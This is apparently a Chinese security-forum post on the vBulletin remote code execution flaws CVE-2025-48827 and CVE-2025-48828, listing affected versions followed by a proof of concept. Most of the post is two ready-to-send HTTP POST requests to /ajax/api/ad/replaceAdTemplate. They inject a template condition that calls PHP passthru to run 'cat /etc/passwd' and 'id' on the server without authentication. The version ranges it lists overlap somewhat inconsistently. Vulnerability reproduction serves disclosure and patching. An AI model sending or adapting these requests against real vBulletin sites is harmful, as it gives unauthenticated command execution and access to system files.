vBulletin远程代码执行漏洞(CVE-2025-48827&CVE-2025-48828)-网络安全论坛-网络安全-阻击者联盟

vBulletin远程代码执行漏洞(CVE-2025-48827&CVE-2025-48828)

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟昨天发布
90

Internet Brands vBulletin是Internet Brands公司的一个论坛插件。vBulletin是一款功能强大的开源论坛软件,它支持多种数据库,如MySQL、PostgreSQL等。它提供了灵活的权限管理系统,让管理员可以精细控制不同用户组和用户的访问权限和功能使用,适用于各种规模的在线社区。

Internet Brands vBulletin 5.0.0至5.7.5版本和6.0.0至6.0.3版本存在安全漏洞,该漏洞源于未经身份验证的用户可能调用受保护的API控制器方法。

Image
0x02影响版本

5.0.0 <= vBulletin < 5.7.6 

5.1.0<=vBulletin<=6.0.3

6.0.0 <= vBulletin < 6.0.4
CVE-2025-48827

d2b5ca33bd20250609105642

CVE-2025-48828

d2b5ca33bd20250609105652

1.访问漏洞环境

d2b5ca33bd20250609105702

2.对漏洞进行复现

 POC 

漏洞复现

请求1

POST /ajax/api/ad/replaceAdTemplate HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=htchn&template=<vb:if condition='"passthru"("cat+/etc/passwd")'></vb:if>

  请求2

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=htchn&template=<vb:if condition='"passthru"("id")'></vb:if>

  通过php代码执行cat /etc/passwd,查看响应判断漏洞存在

d2b5ca33bd20250609105741

通过php代码执行id,查看响应判断漏洞存在

d2b5ca33bd20250609105754

 

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面